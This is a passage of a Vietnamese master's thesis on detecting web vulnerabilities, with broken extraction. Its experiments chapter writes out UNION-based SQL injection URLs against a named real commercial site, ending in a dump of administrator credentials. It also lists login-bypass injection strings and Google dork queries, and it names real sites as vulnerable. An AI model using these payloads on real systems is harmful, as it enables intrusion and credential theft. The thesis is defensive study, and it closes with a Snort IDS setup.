HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG - NGUYỄN THỊ THÁI NGHIÊN CỨU PHÁT HIỆN LỖ HỔNG BẢO MẬT WEB VÀ THỬ NGHIỆM LUẬN VĂN THẠC SĨ KỸ THUẬT (Theo định hướng ứng dụng) HÀ NỘI – 2019 download by : skknchat@gmail.com HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG - NGUYỄN THỊ THÁI NGHIÊN CỨU PHÁT HIỆN LỖ HỔNG BẢO MẬT WEB VÀ THỬ NGHIỆM CHUYÊN NGÀNH: KHOA HỌC MÁY TÍNH MÃ SỐ: 8.48.01.01 LUẬN VĂN THẠC SĨ KỸ THUẬT (Theo định hướng ứng dụng) NGƯỜI HƯỚNG DẪN KHOA HỌC: TS VŨ VĂN THỎA HÀ NỘI – 2019 download by : skknchat@gmail.com i LỜI CAM ĐOAN Tôi cam đoan cơng trình nghiên cứu riêng tơi Nội dung luận văn có tham khảo sử dụng tài liệu, thông tin đăng tải tạp chí khoa học trang web liệt kê danh mục tài liệu tham khảo Tất tài liệu tham khảo có xuất xứ rõ ràng trích dẫn hợp pháp Tơi xin hồn tồn chịu trách nhiệm chịu hình thức kỷ luật theo quy định cho lời cam đoan Hà nội, ngày 28 tháng 01năm 2019 Người cam đoan Nguyễn Thị Thái download by : skknchat@gmail.com ii LỜI CẢM ƠN Trong q trình thực luận văn này, em ln nhận hướng dẫn, bảo tận tình Thầy TS Vũ Văn Thỏa, Khoa Đào tạo sau đại học cán trực tiếp hướng dẫn khoa học cho em Thầy dành nhiều thời gian việc hướng dẫn cách nghiên cứu, đọc tài liệu, cài đặt thuật toán giúp đỡ xây dựng hệ thống thực nghiệm Em xin chân thành cảm ơn Thầy, Cô giáo Học viện Công nghệ Bưu Viễn thơng ln nhiệt tình giúp đỡ tạo điều kiện tốt cho em suốt trình học tập trường Xin chân thành cảm ơn anh, chị bạn học viên lớp Cao học – Học viện động viên, giúp đỡ nhiệt tình chia sẻ với em kinh nghiệm học tập, cơng tác suốt khố học Em xin chân thành cảm ơn vị lãnh đạo bạn đồng nghiệp quan ln tạo điều kiện tốt để em hồn thành tốt đẹp khố học Cao học Em xin chân thành cảm ơn ! Hà Nội, ngày 28 tháng 01 năm 2019 download by : skknchat@gmail.com iii MỤC LỤC LỜI CAM ĐOAN i LỜI CẢM ƠN ii DANH SÁCH CÁC HÌNH VẼ vi DANH MỤC CÁC THUẬT NGỮ VIẾT TẮT .vii MỞ ĐẦU CHƯƠNG 1: TỔNG QUAN VỀ TẤN CÔNG LỖ HỔNG BẢO MẬT WEBSITE 1.1 Tổng quan công nghệ Web 1.1.1 Giới thiệu chung 1.1.2 Dịch vụ chế hoạt động Web 1.1.3 Công nghệ web 2.0 1.1.4 Công nghệ web 3.0 1.2 Một số phương thức công lỗ hổng bảo mật website 10 1.2.1 Giới thiệu chung 10 1.2.2 Các phương thức công lỗ hổng bảo mật website 11 1.2.3 Nhận xét đánh giá 16 1.3 Một số nguyên nhân gây lỗ hổng bảo mật website 16 1.3.1 Nguyên nhân tảng xây dựng website 16 1.3.2 Nguyên nhân hạ tầng cung cấp dịch vụ web 17 1.3.3 Nguyên nhân người vận hành sử dụng dịch vụ web 18 1.3.4 Nhận xét đánh giá 18 1.4 Kết luận chương 19 Chương 2: NGHIÊN CỨU GIẢI PHÁP PHÁT HIỆN LỖ HỔNG BẢO MẬT WEBSITE 20 2.1 Tổng quan phát lỗ hổng bảo mật Website 20 2.1.1 Giới thiệu chung 20 2.1.2 Mơ hình phát lỗ hổng bảo mật Website 21 2.2 Giải pháp sử dụng cơng cụ phần mềm dị qt 24 2.2.1 Giới thiệu giải pháp 24 2.2.2 Một số phần mềm phát lỗ hổng bảo mật Website 25 2.2.3 Nhận xét 29 download by : skknchat@gmail.com iv 2.3 Giải pháp sử dụng hệ thống phát xâm nhập 29 2.3.1 Giới thiệu hệ thống phát xâm nhập 29 2.3.2 Ứng dụng hệ thống IDS phát lỗ hổng bảo mật Website 33 2.3.3 Nhận xét 37 2.4 Giải pháp sử dụng kỹ thuật học máy 37 2.4.1 Giới thiệu học máy 37 2.4.2 Ứng dụng kỹ thuật học máy phát lỗ hổng bảo mật Website 40 2.4.3 Nhận xét 43 2.4 Kết luận chương 43 Chương 3: THỬ NGHIỆM 44 3.1 Yêu cầu thử nghiệm 44 3.1.1 Đặt toán 44 3.1.2 Giới thiệu chung Python 45 3.2 Kịch thử nghiệm 1: Thử nghiệm dò quét cổng website mở 47 3.2.1 Bài toán thử nghiệm 47 3.2.2 Kết thử nghiệm 48 3.2.3 Đánh giá kết thử nghiệm 51 3.3 Kịch thử nghiệm 2: Thử nghiệm công website phương thức DDoS 51 3.3.1 Bài toán thử nghiệm 51 3.3.2 Kết thử nghiệm 52 3.3.3 Đánh giá kết thử nghiệm 55 3.4 Kịch thử nghiệm 3: Thử nghiệm phát lỗ hổng bảo mật SQL Injection 56 3.4.1 Bài toán thử nghiệm 56 3.4.2 Kết thử nghiệm 57 3.4.3 Đánh giá kết thử nghiệm 62 3.5 Kịch thử nghiệm 4: Thử nghiệm kiểm tra lỗi trang website phương pháp Google Hacking 62 3.5.1 Bài toán thử nghiệm 62 3.5.2 Kết thử nghiệm 62 3.5.3 Đánh giá kết thử nghiệm 65 download by : skknchat@gmail.com v 3.6 Kịch thử nghiệm 5: Thử nghiệm đề xuất hệ thống IDS sử dụng Snort 66 3.6.1 Bài toán thử nghiệm 66 3.6.2 Kết thử nghiệm 67 3.6.3 Đánh giá kết thử nghiệm 70 3.7 Kết luận chương 70 KẾT LUẬN 71 DANH MỤC CÁC TÀI LIỆU THAM KHẢO 72 download by : skknchat@gmail.com vi DANH SÁCH CÁC HÌNH VẼ Hình 1.1 Dịch vụ Web Service[10] Hình 1.2 Cơ chế hoạt động Web Service[10] Hình 1.3 Các loại hình dịch vụ phổ biến web 2.0 [10] Hình 1.4 Tiến trình phát triển công nghệ web (Nguồn Internet) 10 Hình 2.2: Sơ đồ thực cơng lỗ hổng sở liệu SQL web 25 Hình 2.3: Giao diện phần mềm Havaij quét lỗ hổng bảo mật web 26 Hình 2.4: Giao diện phần mềm Havij khai thác tên mật người dùng 27 Hình 2.5: Giao diện phần mềm WVS khai thác lỗ hổng bảo mật website 28 Hình 2.6: Giao diện khởi động file sqlmap.py 28 Hình 2.7: Các thành phần hệ thống IDS [4] 30 Hình 2.7: Mơ hình hệ thống HIDS 31 Hình 2.8: Mơ hình hệ thống NIDS 31 Hình 2.9: Mơ hình hệ thống IDS phát lỗ hổng bảo mật 36 Hình 2.10: Mơ hình cơng SQLi sử dụng chèn tham số 41 Hình 2.11: Mơ hình phát cơng SQLi sử dụng SVM …………………… 43 Hình 3.4: Giao diện trang website trước bị công 52 Hình 3.7: Kết phát lỗi trang web có tổn thương SQL Injection 58 Hình 3.11: Trang giao diện truy xuất tên mật Database 61 Hình 3.12: Hiển thị trang website bị lỗi truy xuất hình ảnh 64 Hình 3.13: Trang website bị lỗi truy xuất hình ảnh 65 Hình 3.14: Website bị lỗi truy xuất hình ảnh 65 Hình 3.15: Mơ hình thử nghiệm hệ thống IDS sử dụng Snort 66 Hình 3.16: Cài đặt Snort (Bước 1) 67 Hình 3.17: Cài đặt Snort (Bước 2) 68 Hình 3.18: Cài đặt Snort (Bước 3) 68 Hình 3.19: Cài đặt Snort (Bước 4) 69 Hình 3.20: Cài đặt Snort (Bước 5) 69 Hình 3.21: Kết thực Snort 70 download by : skknchat@gmail.com vii DANH MỤC CÁC THUẬT NGỮ VIẾT TẮT Viết tắt Tiếng Anh Tiếng việt APT Advanced Persistent Threat Mối đe dọa nâng cao DDoS Distribute Denial of Service Tấn công từ chối dịch vụ phân tán DMZ Demilitarized Zone Vùng nhận dạng DoS Denial of Service Tấn công từ chối dịch vụ Hyper Text Transfer Protocol Giao thức truyền tải siêu văn IDS Intrusion detection system Hệ thống phát xâm nhập IPS Intrusion Prevention system Hệ thống ngăn chặn xâm nhập ISS Internet Security Systems Hệ thống bảo mật Internet NSM Network System Monitor Hệ thống giám sát bảo mật mạng HTTP OWASP Open Web Application Security Project Dự án mở bảo mật ứng dụng Web SQL Structured Query Language Ngôn ngữ truy vấn cấu trúc TCP Transmission Control Protocol Giao thức kiểm soát truyền tin XSS Cross-Site Scripting Tấn công thực thi mã script download by : skknchat@gmail.com MỞ ĐẦU Tính cấp thiết đề tài Vấn đề an toàn an ninh mạng vấn đề cấp bách, đặc biệt việc công vào website Việc công vào hệ thống mạng ứng dụng web ngày gia tăng, cho thấy việc bảo mật an tồn thơng tin website chưa thực đảm bảo Theo thống kê BKAV[12] an ninh mạng năm 2017, mức thiệt hại virus máy tính gây người dùng Việt Nam lên tới 10.400 tỷ, vượt qua mức 8.700 tỷ đồng năm 2016 Đây kết từ chương trình đánh giá an ninh mạng Tập đồn công nghệ Bkav thực vào tháng 12/2017 Mã độc mã hóa liệu Ransomware, virus lây qua USB, vấn nạn tin nhắn rác nguy từ cơng có chủ đích APT chủ điểm nóng năm 2017 Cũng theo thống kê Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam [13], năm 2017 Trung tâm ghi nhận tổng số 134.375 cố công mạng loại hình Phishing (lừa đảo), Malware (mã độc) Deface (thay đổi giao diện) So với năm 2016, số lượng vụ công mạng năm 2017 nhiều gấp 4,2 lần (năm 2016 31.585), đó, loại hình công Phishing 10.057 cố (gấp 1,7 lần so với năm 2016), Malware 46.664 cố (gấp gần 2,8 lần năm 2016) Deface 77.654 cố (gấp 8,7 lần năm 2016) Mặt khác, theo khảo sát Hiệp hội An tồn thơng tin Việt Nam, số an tồn thơng tin Việt Nam năm 2017 59,9% Đây bước tiến đáng kể năm qua, năm 2016, số 47,4% Đặc biệt theo thống kê Microsoft, nước đứng đầu toàn cầu nguy nhiễm mã độc có nước thuộc khu vực Đơng Nam Á Việt Nam Indonesia Đây hai nước có tỷ lệ nhiễm mã độc 45% vào q II/2016, gấp đơi so với mức trung bình kỳ 21% giới Do nhu cầu phát triển dịch vụ thông tin mạng internet ngày lớn, đòi hỏi quan, tổ chức doanh nghiệp phải đảm bảo an toàn cho website download by : skknchat@gmail.com 59 Như sau dùng câu lệnh trên, trang website xuất lỗi bảng số bảng số sở liệu SQL sau: Hình 3.8: Trang giao diện xuất lỗi bảng có kết nối CSDL (3) Theo hình 3.8 ta thấy lỗi bảng bảng xuất Ở tác giả chọn bảng số để khai thác tiếp Thực thêm vào tiếp câu lệnh bảng số group_concat(database()) để lấy database liệu http://www.nhuaphucthinh.com.vn/product.php?id=-20 UNION SELECT 1,2,group_concat(database()),4,5,6,7,8,9,10,11 Kết xuất Database có tên nhuaphucth_inh sở liệu website theo hình sau: download by : skknchat@gmail.com 60 Hình 3.9: Trang giao diện xuất Database CSDL Hoặc lấy user sở liệu http://www.nhuaphucthinh.com.vn/product.php?id=-20 UNION SELECT 1,2,group_concat(user()),4,5,6,7,8,9,10,11 ->nhuaphucth_inh@localhost (4) Từ Database có, ta dễ dàng hiển thị bảng Database để lấy bảng, thực câu lệnh: http://www.nhuaphucthinh.com.vn/product.php?id=-20 UNION 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 information_schema.tables where table_schema=database() download by : skknchat@gmail.com SELECT from 61 Hình 3.10: Trang giao diện truy xuất bảng Database CSDL (5) Và cuối bảng sở liệu liệt kê, ta khai thác bảng liệt kê trên, tác giả chọn bảng Administration để lấy thông tin người quản trị tên đăng mật đăng nhập: http://www.nhuaphucthinh.com.vn/product.php?id=-20 UNION SELECT 1,2,group_concat(AdmUsername,0x7c,AdmPassword),4,5,6,7,8,9,10,11 from administrator Hình 3.11: Trang giao diện truy xuất tên mật Database download by : skknchat@gmail.com 62 3.4.3 Đánh giá kết thử nghiệm Với phương pháp sử dụng kỹ thuật công SQL Injection này, tác giả mong muốn thực trang web kiểm tra xem trang web có lỗ hổng bảo mật sở liệu hay không, lỗi trang web hay gặp phải số lỗi sau: ('admin'or 1=1 or ''='", "'=1\' or \'1\' = \'1\'", "'or 1=1", "'1 'or' '=' 1", "'or 1=1#", "'0 'or' '=' 0", "'admin'or 1=1 or ''='", "'admin' or 1=1", "'admin' or '1'='1", "'or 1=1/*", "'or 1=1 ") Tất lỗi dễ hacker dùng kĩ thuật khai thác vào hệ thống được, thông qua lỗi trên, quản trị biết có hướng khắc phục 3.5 Kịch thử nghiệm 4: Thử nghiệm kiểm tra lỗi trang website phương pháp Google Hacking 3.5.1 Bài tốn thử nghiệm Mục đích tốn thử nghiệm sử dụng máy tình kiếm Google để truy tìm tơng tích đối tượng, dùng Google để công hệ thống Với khả tìm kiếm lợi hại Google, kẻ cơng có thề tìm thấy nhiều thơng tin hữu ích, cho q trình theo dõi mục tiêu cơng vào đối tượng Kết tìm lỗ hổng Server: Lỗi phiên bản, bug, … Các thông tin nhạy cảm từ thông báo đưa ra, File chứa mật khẩu, Thư mục nhạy cảm: thư mục chứa code lỗi, …Trang đăng nhập vào hệ thống, Trang chứa thơng tin cấu hình mạng, firewall log firewall, … Xây dựng bước để thử nghiệm: Bước 1: Nghiên cứu từ khóa kết hợp từ khóa để thực cơng Bước 2: Sử dụng trang website google.com.vn để thực tìm kiếm từ khóa xác định Bước 3: Tìm website bị dính lỗi có khả truy cập khai thác thông tin sau sử dụng từ khóa đặc biệt tìm kiếm trang google.com.vn 3.5.2 Kết thử nghiệm download by : skknchat@gmail.com 63 Dùng trang Google.com.vn để thực khai thác công vào trang website bị lỗi với cú pháp câu lệnh kết hợp sau: [intitle:] Giúp Google giới hạn kết tìm kiếm trang có chứa từ tiêu đề Ví dụ: intitle:login password, allintitle:login password [inurl:] Giới hạn kết tìm kiếm địa URL có chứa từ khóa t́m kiếm VD: inurl:etc/password, allinurl:etc/password [site:] Giới hạn Google truy vấn từ khóa xác định site tên miền riêng biệt VD: site:actvn.edu.vn [filetype:] Giới hạn Google tìm kiếm files internet có phần mở rộng riêng biệt (như: doc, pdf hay ppt v.v ) VD: filetype:doc [link:] Liệt kê trang web mà có liên kết đến đến trang web định VD: link:www.securityfocus.com [intext:] Tìm kiếm từ website riêng biệt VD: intext:hacker Hoặc câu lệnh nâng cao Index of /admin Index of /passwd Index of /password Index of /mail "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess "Index of /secret“ download by : skknchat@gmail.com 64 "Index of /confidential“ "Index of /root“ "Index of /cgi-bin“ "Index of /credit-card“ "Index of /logs“ "Index of /config" Cụ thể thực nghiệm này, tác giả dùng câu lệnh để khai thác website lỗi có truy xuất hình ảnh: inurl:"index.php?option=com_media" site: tên miền Hình 3.12: Hiển thị trang website bị lỗi truy xuất hình ảnh Với thay đổi tên miền, ta liệt kê nhiều trang website bị lỗi Nếu mở trang web http://www.htu.edu.vn Hình 3.12 sau: download by : skknchat@gmail.com 65 Hình 3.13: Trang website bị lỗi truy xuất hình ảnh Hoặc trang kế tiếp, trang website: http://www.sgtvtsonla.gov.vn Hình 3.14: Website bị lỗi truy xuất hình ảnh 3.5.3 Đánh giá kết thử nghiệm Với phương pháp Google Hacking, dùng trang web google.com.vn để thực truy vấn trang website bị lỗi, ta dễ dàng khai thác số lỗ hổng bảo mật web website có truy xuất hình ảnh truy cập download by : skknchat@gmail.com 66 trực tiếp vào sở liệu hệ thống lấy thông tin cần thiết Với tiếp cận người cơng dễ dàng thực yêu cầu từ lỗi website Do đó, Google cơng cụ tìm kiếm mạnh mẽ mà trở thành công cụ công Hacker 3.6 Kịch thử nghiệm 5: Thử nghiệm đề xuất hệ thống IDS sử dụng Snort 3.6.1 Bài toán thử nghiệm Mục tiêu toán thử nghiệm đề xuất mơ hình hệ thống IDS sử dụng Snort để phát lỗ hổng bảo mật cho hệ thống Website dựa phát xâm nhập mạng Mơ hình thử nghiệm trình bày hình 3.15 Hình 3.15: Mơ hình thử nghiệm hệ thống IDS sử dụng Snort Trong mô hình trên, hacker cơng từ bên ngồi vào trước tiên chúng phải qua hệ thống phân tích gói tin IDS Khi hệ thống IDS hoạt động có phản ứng phù hợp với tình bị cơng vào lỗ hổng bảo mật Website Xây dựng bước thực thử nghiệm sau: Bước 1: Cài đặt mã nguồn mở Pfsense hệ điều hành Linux Bước 2: Cài đặt thiết lập cấu hình mã nguồn mở Snort để thực giám sát ngăn chặn truy cập mạng trái phép Bước 3: Cấu hình xây dựng luật (ruler) Snort download by : skknchat@gmail.com 67 3.6.2 Kết thử nghiệm Quá trình thử nghiệm cài đặt dựa theo tài liệu hướng dẫn công cụ Pfsense [15] Bước 1: Vào menu System => Packages, Chọn thẻ Available Packages => tìm mục Snort click vào dấu cộng Sau cài đặt xong qua thẻ Installed Packages thấy gói snort có Hình 3.16: Cài đặt Snort (Bước 1) download by : skknchat@gmail.com 68 Bước 2: Cấu hình Snort Vào Services => Snort Hình 3.17: Cài đặt Snort (Bước 2) Bước 3: Trên giao diện Snort, chọn tab Global Settings Tại thiết lập sử dụng Rules Snort có loại Rules: Snort VRT, Snort Comminity Snort Subscribe Hình 3.18: Cài đặt Snort (Bước 3) download by : skknchat@gmail.com 69 Bước 4: Cài đặt Rules Chọn tab Update để tải Rules Hình 3.19: Cài đặt Snort (Bước 4) Bước 5: Thiết lập giao diện Snort Sau bước cài đặt rule xong, quay lại tab Snort Interfaces => thiết lập Snort cho Interface cách click “+” Hình 3.20: Cài đặt Snort (Bước 5) Kết thử nghiệm: Sau giả lập truy cập vào hệ thống Website, hệ thống Snort đưa kết mô tả cảnh báo hình 3.21 download by : skknchat@gmail.com 70 Hình 3.21: Kết thực Snort 3.6.3 Đánh giá kết thử nghiệm Luận văn tiến hành cài đặt Snot Pfsense thiết lập rules Snot nhằm giả lập hệ thống IDS giúp hệ thống phát xâm nhập, công trái phép Kết đạt là: Hệ thống với Snot hỗ trợ phát xâm nhập, cơng trái phép Từ đó, hệ thống gửi báo cáo giúp nhận biết triển khai phương án phòng chống hiệu 3.7 Kết luận chương Trong chương luận văn xây dựng năm kịch thử nghiệm mô giải pháp phát lỗ hổng bảo mật hệ thống Website Các kết thử nghiệm cho thấy giải pháp phát lỗ hổng bảo mật đề xuất triển khai thực tế phù hợp với yêu cầu đề download by : skknchat@gmail.com 71 KẾT LUẬN Các kết đạt luận văn: Với mục tiêu nghiên cứu giải pháp phát lỗ hổng bảo mật WEB thử nghiệm, luận văn đạt số kết sau đây: - Nghiên cứu tổng quan công nghệ Web vấn đề liên quan - Nghiên cứu tổng quan công lỗ hổng bảo mật WEB - Nghiên cứu đề xuất mơ hình tổng qt phát lỗ hổng bảo mật WEB - Nghiên cứu ba giải pháp phát lỗ hổng bảo mật WEB vấn đề liên quan - Xây dựng tiến hành năm kịch thử nghiêm phát lỗ hổng bảo mật WEB Hướng phát triển tiếp theo: - Thực xây dựng số chương trình có khả phát lỗ hổng trang web viết ngôn ngữ lập trình ASP.NET - Xây dựng hệ thống dị qt lỗ hổng bảo mật phân tích lỗ hổng chi tiết nhằm hỗ trợ cho bảo đảm an toàn hệ thống Website download by : skknchat@gmail.com 72 DANH MỤC CÁC TÀI LIỆU THAM KHẢO Tiếng Việt [1] Hoàng Xuân Dậu (2007) – "Bài giảng an tồn bảo mật hệ thống thơng tin", Học viện Cơng nghệ Bưu Viễn thơng [2] Hồ Văn Hương, Đỗ Thị Huệ, Hoàng Vĩnh Hà (2014) – “Phân loại phát lỗ hổng hệ thống thơng tin”, Tạp chí An tồn thơng tin Tiếng Anh [3] Debasish Das, Utpal Sharma, D.K Bhattacharyya (2010) - “An Approach to Detection of SQL Injection Attack Based on Dynamic Query Matching”, International Journal of Computer Applications, Volume 1, No 25, pp 28 – 33 [4] Ali A Ghorbani, Wei Lu and Mahbod Tavallaee (2010) – “Network Intrusion Detection and Prevention: Concepts and Techniques”, Springer Publishing, Canada [5].Hans Fangohr (2015) – “Python for Computational Science and Engineering”, Textbook, University of Southampton [6] A Joshi, V Geetha (2014) - “SQLi detection using machine learning,”, Control, Instrumentation, Communication and Computational Technologies, pp 1111–1115 [7] R Komiya, I Paik, M Hisada (2011) - “Classification of malicious web code by machine learning”, Awareness Science and Technology (iCAST), pp 406– 411 [8] Mike Shema (2012) – “Hacking Web Apps: Detecting and Preventing Web Application Security Problems”, Elsevier Inc [9] Dafydd Stuttard, Marcus Pinto (2011) – “The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws”, John Wiley & Sons [10] Bryan Sullivan, Vincent Liu (2012) – “Web Application Security, A Beginner's Guide”, McGraw-Hill [11] Jason Weir (2014) - “Building a Debian\Snort based IDS”, McGraw-Hill download by : skknchat@gmail.com 73 Trang Web [12] http://bkav.com.vn/ [13] http://vncert.gov.vn [14] http://www.tutorialspoint.com/python/python_database_access.htm [15] https://www.pfsense.org/ [16] https://www owasp.org download by : skknchat@gmail.com ... công cụ phát lỗ hổng bảo mật Website để đảm bảo an toàn Website trình cung cấp dịch vụ WEB Mục đích nghiên cứu Mục đích nghiên cứu luận văn nghiên cứu phát lỗ hổng bảo mật website thử nghiệm số... pháp phát lỗ hổng bảo mật Website download by : skknchat@gmail.com 20 Chương 2: NGHIÊN CỨU GIẢI PHÁP PHÁT HIỆN LỖ HỔNG BẢO MẬT WEBSITE Trong chương luận văn nghiên cứu số giải pháp phát lỗ hổng bảo. .. pháp phát lỗ hổng bảo mật website thường gặp Đối tượng phạm vi nghiên cứu Đối tượng phạm vi nghiên cứu luận văn nghiên cứu giải pháp công cụ phát lỗ hổng bảo mật website Phương pháp nghiên cứu